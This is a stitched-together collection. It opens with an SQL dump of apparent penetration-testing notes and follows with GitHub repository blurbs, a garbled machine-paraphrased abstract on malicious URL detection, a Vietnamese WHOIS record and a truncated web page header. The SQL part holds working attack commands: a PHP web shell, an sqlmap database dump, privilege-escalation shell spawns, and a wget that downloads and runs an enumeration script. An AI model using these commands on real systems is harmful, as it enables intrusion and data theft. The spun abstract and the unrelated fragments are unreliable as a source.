INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;
MSAdministrator
This module is used to report phishing URLs to their WHOIS/RDAP abuse contact information.
jstrosch
Python3 script that can download samples directly from Abuse.CH or via submitted URLs
MadhavSingh2236
With WWW being the global platform, various fields inclusive to the same have emerged until hitherto. Due to ever-changing forms of cyber Security, it has become a necessity to classify Malicious websites so as to secure personal content. In this project we have implemented The State-Of-the-Art Decision Tree Machine Learning Models such as Random Forest and Decision Tree to classify URLs as malicious or amiable. Implementation of Classification algorithms for discrete data as well as normal regression model is used in the project. Malevolent URLs have been broadly used to mount different digital assaults including spamming, phishing and malware. Recognition of malignant URLs and distinguishing proof of danger types are basic to upset these assaults. Knowing the sort of a danger empowers assessment of seriousness of the assault and embraces a viable countermeasure. Existing strategies commonly distinguish vindictive URLs of a solitary assault type. In this paper, we propose technique utilizing AI to identify malevolent URLs of all the mainstream assault types. While the World Wide Web has become a stellar application on the Internet, it has likewise gotten a massive danger of digital assaults. Enemies have utilized the Web as a vehicle to convey malignant assaults, for example, phishing, spamming, and malware contamination. For instance, phishing ordinarily includes sending an email apparently from a dependable source to deceive individuals to click a URL (Uniform Resource Locator) contained in the email that joins to a fake page. To address Web-based assaults, an incredible exertion has been coordinated towards identification of noxious URLs. A typical countermeasure is to utilize a boycott of vindictive URLs, which can be built from different sources, particularly human criticisms that are exceptionally precise yet tedious. Boycotting acquires no bogus positives, however is successful just for known noxious URLs. It can't identify obscure malevolent URLs. The very idea of careful match in boycotting these renders it simple to be sidestepped. This shortcoming of blacklisting has been tended to by oddity-based location techniques intended to identify obscure vindictive URLs. In these strategies, a characterization model dependent on discriminative principles or highlights is worked with either information from the earlier or through machine learning. Choice of discriminative standards or highlights assumes a basic function for the presentation of a locator. Online malware assaults become one in everything about chief genuine dangers that need to be tended too frantically. Numerous methodologies that have stood out as promising manners by which of safeguard work, for example, malware grasp utilizing various boycotts. Nonetheless, these standard methodologies ordinarily neglect to watch new assaults due to the adaptability of malignant sites. Consequently, it's hard to deal with state-of-the-art boycotts with data concerning new vindictive sites. Malignant location identification assumes a significant part for a few network protection applications, and unmistakably AI moves toward square measure a promising course. In mix with protection imperatives on information sets of real client traffic, its irksome for scientists and product engineers to measure hostile to malware arrangements against huge scope information sets of practical net traffic. AI strategy [1] region unit utilized so as to characterize the online deals into malignant and benevolent URLs. The appearance of ongoing correspondence innovations has had enormous contact with in the development and advancement of organizations spamming over a few applications just as web based banking, online business, and long range informal communication. In actuality, in the present age it's almost required to have a web presence to run a famous endeavour. Accordingly, the significance of the overall net has ceaselessly been expanding. Unfortunately the mechanical promotions return in expansion to new unobtrusive strategies to assault and trick client. Such assaults grasp noxious sites that sell fake stock, financial extortion by fooling clients into uncovering delicate data that in the long run cause stealing of money or character, or maybe placing in malware inside the clients framework. There square measure a huge kind of procedures to actualize such assaults, similar to explicit hacking attempts, Derive-by abuses, Denial of administration [2], Distributed refusal of administration [1] and bunches of others. Concentrating the changeability of assaults, without a doubt new assault assortments, and furthermore the unnumbered settings inside which such assaults will appears, it's exhausting to style-solid frameworks to find digital security penetrates. The restrictions of customary security the board advancements are getting to an ever increasing extent genuine given this remarkable development of new security dangers, fast changes of new IT advancements, and critical deficiency of security experts. The vast majority of these assaulting strategies are acknowledged through spreading traded off URLs. A primary exploration exertion in pernicious URL recognition has zeroed in on choosing profoundly successful discriminative highlights. Existing techniques were intended to distinguish pernicious URLs of a solitary assault type, for example, spamming, phishing, or malware. In this paper, we propose a strategy utilizing Machine Learning Algorithms on how to distinguish malevolent URLs of all the well known assault types including phishing, spamming and malware contamination, and distinguish the assault types noxious URLs endeavour to dispatch.
D00MFist
Tool to create a template to abuse Custom URL Schemes
OCSAF
With this bash script, you can quickly check whether an IP or URL has been abused by cybercriminals for malware and spam.
Cyreslab-AI
MCP server for accessing URLhaus malicious URL database from abuse.ch - provides threat intelligence for cybersecurity research
sadn1ck
(taken *offline* due to abuse) URL shortener and customizer written in Nest and Typescript and deployed with Docker
csirt-rd
Team Cymru provides daily lists of compromised or abused devices for the ASNs and/or netblocks with a CSIRT’s jurisdiction. This includes such information as bot infected hosts, command and control systems, open resolvers, malware urls, phishing urls, and brute force attacks
Azelphur
Chrome Extension Stop short URL abuse by previewing the URL automatically before visiting it.
Pyvonix
Script to collect and report compromised URL to urlhaus.abuse.ch
Domain Name: IB868.COM Đăng ký tên miền ID: 1825488808_DOMAIN_COM-VRSN Đăng ký WHOIS Server: whois.enom.com URL Đăng ký: www.enom.com Ngày cập nhật: 2014/09/16 01: 50: 56Z Ngày tạo: 2013/09/04 08: 51: 00Z Đăng ký đăng ký hết hạn: 2015/09/04 08: 51: 00Z Đăng ký: ENOM, INC. Đăng ký IANA ID: 48 Lạm dụng Đăng ký Liên hệ Email: abuse@enom.com Đăng ký lạm dụng điện thoại liên hệ: 1,4252744500 Đại lý bán lẻ: NAMECHEAP.COM Tình trạng Domain: clientTransferProhibited Registry ID Registrant: Tên người đăng ký: NAMECHEAP.COM NAMECHEAP.COM Tổ chức đăng ký: NAMECHEAP.COM Đường đăng ký: 8939 S. Sepulveda BLVD. # 110-732 Đăng ký Thành phố: WESTCHESTER Tiểu bang / tỉnh đăng ký: CA Đăng ký Postal Code: 90045 Đăng ký Quốc gia: Mỹ Đăng ký Điện thoại: 1,6613102107 Điện thoại đăng ký Ext: Fax đăng ký: Đăng ký Fax Ext: Đăng ký Email: SUPPORT@NAMECHEAP.COM Đăng ký ID của Admin: Tên Admin: NAMECHEAP.COM NAMECHEAP.COM Tổ chức quản trị: NAMECHEAP.COM Quản trị Street: 8939 S. Sepulveda BLVD. # 110-732 Quản trị viên Thành phố: WESTCHESTER Quản trị viên Tiểu bang / Tỉnh: CA Quản trị viên Mã bưu điện: 90045 Quản trị viên Quốc gia: Mỹ Quản trị Điện thoại: 1,6613102107 Quản trị Điện thoại Ext: Fax Admin: Quản trị Fax Ext: Quản trị viên Email: SUPPORT@NAMECHEAP.COM Registry Tech ID: Công nghệ Tên: NAMECHEAP.COM NAMECHEAP.COM Tổ chức công nghệ: NAMECHEAP.COM Công nghệ Street: 8939 S. Sepulveda BLVD. # 110-732 Công nghệ cao Thành phố: WESTCHESTER Tech Bang / Tỉnh: CA Công nghệ Postal Code: 90045 Công nghệ Quốc gia: Mỹ Công nghệ Điện thoại: 1,6613102107 Điện thoại công nghệ cao Ext: Công nghệ Fax: Công nghệ Fax Ext: Công nghệ Email: SUPPORT@NAMECHEAP.COM Tên máy chủ: DNS1.CLOUDNS.NET Tên máy chủ: DNS2.CLOUDNS.NET Tên máy chủ: NS3.CLOUDNS.NET Tên máy chủ: NS4.CLOUDNS.NET DNSSEC: unsigned URL của hệ thống Vấn đề báo cáo ICANN WHOIS dữ liệu: http://wdprs.internic.net/ Cập nhật mới nhất của cơ sở dữ liệu WHOIS: 2014/09/16 01: 50: 56Z Các dữ liệu trong cơ sở dữ liệu whois này được cung cấp cho bạn thông tin mục đích duy nhất, đó là, để giúp bạn có được thông tin về hoặc liên quan đến hồ sơ đăng ký tên miền. Chúng tôi làm cho thông tin này có sẵn "như là," và không đảm bảo độ chính xác của nó. Bằng việc gửi một truy vấn whois, bạn đồng ý rằng bạn sẽ sử dụng dữ liệu này chỉ dành cho hợp pháp mục đích và rằng, trong mọi trường hợp, bạn sẽ sử dụng dữ liệu này để: (1) cho phép số lượng lớn, tự động, các quy trình điện tử căng thẳng hoặc tải hệ thống cơ sở dữ liệu whois này cung cấp cho bạn thông tin này; hoặc (2) cho phép, cho phép, hoặc hỗ trợ việc truyền tải khối lượng không mong muốn, quảng cáo thương mại hay lôi kéo qua thư trực tiếp, điện tử mail, hoặc qua điện thoại. Việc lập, đóng gói lại, phổ biến, sử dụng các dữ liệu này bị nghiêm cấm mà không có trước bằng văn bản đồng ý từ chúng tôi. Chúng tôi có quyền thay đổi các điều khoản này bất cứ lúc nào. Bằng việc gửi truy vấn này, bạn đồng ý tuân theo các điều khoản này. Phiên bản 6.3 2002/04/03
eline138
<!DOCTYPE html><html lang="en" itemscope itemtype="http://schema.org/WebPage"><head><meta charset="utf-8"><script nonce="dJWtMAFtmjuzNhlJ8bIveA">var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();</script><script nonce="dJWtMAFtmjuzNhlJ8bIveA">function _DumpException(e) {throw e;}</script><script nonce="dJWtMAFtmjuzNhlJ8bIveA">_docs_flag_initialData={"atari-emtpr":false,"atari-efpe":false,"atari-etsm":false,"atari-etss":false,"docs-sup":"","docs-eldi":false,"docs-ecci":false,"docs-eeii":false,"docs-ipmmp":true,"docs-esi":false,"docs-liap":"/logImpressions","ilcm":{"eui":"AHKXmL1MGF1ekJwZ7ImMIsBqcBQsznld2L-cmkD1fvo3__hVRKGz2kgjuuVlAmTuk11wub40VroJ","je":1,"sstu":1641425483752000,"si":"CKzFibfim_UCFYvETwodiz4BJA","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5708870,5711808,5711977,5713207,5714550,5714628,5720060,5720927,5729666,5732944,5734573,5734956,5735808,5737339,5738511,5738531,5739804,5739899,5740816,5741777,5742464,5743126,5745624,5747265,5747743,5748031,5750554,5752696,5753008,5753331,5754231,5755040,14101306,14101502,14101510,14101530,14101534],"crc":0,"cvi":[]},"docs-ccdil":false,"docs-eil":true,"docs-eoi":false,"info_params":{"token":"AHL0AtJIu8EZKv94yZDQhDCZvsbjS2KbEQ:1641425483672"},"atari-jefp":"/_/view/jserror","docs-jern":"view","atari-rhpp":"/_/view"}; _docs_flag_cek= null ; if (window['DOCS_timing']) {DOCS_timing['ifdld']=new Date().getTime();}</script><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="referrer" content="strict-origin-when-cross-origin"><link rel="icon" href="https://lh4.googleusercontent.com/ANXYZSl-XnFgMkKOAqMA8kvaAkKhUbDGvB950L2GhgtIrOuA3WPqk8zXZ29ofKZlrZYPO4vaucoNmY5rVsZoaoGmI1BF3zy7U6WGxPHeP-PrdyCY"><meta property="og:title" content="Coloradofoodabankvirtualgala2022"><meta property="og:type" content="website"><meta property="og:url" content="https://sites.google.com/lpsk12.org/coloradofoodabankvirtualgala22/home"><meta property="og:description" content=" King Soopers "><meta itemprop="name" content="Coloradofoodabankvirtualgala2022"><meta itemprop="description" content=" King Soopers "><meta itemprop="url" content="https://sites.google.com/lpsk12.org/coloradofoodabankvirtualgala22/home"><meta itemprop="thumbnailUrl" content="https://lh6.googleusercontent.com/1d00Wotr822E8Bwc0LjjJkez2-wxblKSuwbEMYF7aaCTUyXtCBQ8fRpyRoCwrxxCr26KCRSH93bjIZ-T_dX0Pjo=w16383"><meta itemprop="image" content="https://lh6.googleusercontent.com/1d00Wotr822E8Bwc0LjjJkez2-wxblKSuwbEMYF7aaCTUyXtCBQ8fRpyRoCwrxxCr26KCRSH93bjIZ-T_dX0Pjo=w16383"><meta itemprop="imageUrl" content="https://lh6.googleusercontent.com/1d00Wotr822E8Bwc0LjjJkez2-wxblKSuwbEMYF7aaCTUyXtCBQ8fRpyRoCwrxxCr26KCRSH93bjIZ-T_dX0Pjo=w16383"><meta property="og:image" content="https://lh6.googleusercontent.com/1d00Wotr822E8Bwc0LjjJkez2-wxblKSuwbEMYF7aaCTUyXtCBQ8fRpyRoCwrxxCr26KCRSH93bjIZ-T_dX0Pjo=w16383"><link href="https://fonts.googleapis.com/css?family=Google+Sans_old:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&display=swap" rel="stylesheet" nonce="9lOp92mAeDO1+qe+++OenA"><link href="https://fonts.googleapis.com/css?family=Amiri%3Ai%2Cbi%2C700%2C400%7CAmiko%3Ai%2Cbi%2C700%2C400&display=swap" rel="stylesheet" nonce="9lOp92mAeDO1+qe+++OenA"><link rel="stylesheet" href="https://www.gstatic.com/_/atari/_/ss/k=atari.vw.XD0uDDKJyYg.L.W.O/d=1/rs=AGEqA5mXdsNpZ-quo4B_c_bQGyxcVhUiRw" nonce="9lOp92mAeDO1+qe+++OenA"><title>Coloradofoodabankvirtualgala2022</title><style jsname="ptDGoc" nonce="9lOp92mAeDO1+qe+++OenA">.htnAL{height: 27.0pt; font-size: 12.0pt; font-family: Amiri; font-weight: 400;}.QmpIrf{background-color: rgba(148,113,108,1); color: rgba(249,249,249,1); border-color: rgba(148,113,108,1);}.xkUom{background-color: rgba(0,0,0,0); color: rgba(204,67,49,1); border-color: rgba(204,67,49,1);}.KjwKmc{background-color: rgba(0,0,0,0); color: rgba(204,67,49,1); border-color: rgba(0,0,0,0);}.qeLZfd .QmpIrf{background-color: rgba(204,67,49,1); color: rgba(249,249,249,1); border-color: rgba(204,67,49,1);}.qeLZfd .xkUom{background-color: rgba(0,0,0,0); color: rgba(28,28,28,1); border-color: rgba(28,28,28,1);}.qeLZfd .KjwKmc{background-color: rgba(0,0,0,0); color: rgba(28,28,28,1); border-color: rgba(0,0,0,0);}.lQAHbd .QmpIrf{background-color: rgba(204,67,49,1); color: rgba(249,249,249,1); border-color: rgba(204,67,49,1);}.lQAHbd .xkUom{background-color: rgba(0,0,0,0); color: rgba(249,249,249,1); border-color: rgba(249,249,249,1);}.lQAHbd .KjwKmc{background-color: rgba(0,0,0,0); color: rgba(249,249,249,1); border-color: rgba(0,0,0,0);}.tpmmCb .QmpIrf{background-color: rgba(204,67,49,1); color: rgba(249,249,249,1); border-color: rgba(204,67,49,1);}.tpmmCb .xkUom{background-color: rgba(0,0,0,0); color: rgba(204,67,49,1); border-color: rgba(204,67,49,1);}.tpmmCb .KjwKmc{background-color: rgba(0,0,0,0); color: rgba(204,67,49,1); border-color: rgba(0,0,0,0);}.nyKByd .QmpIrf{background-color: 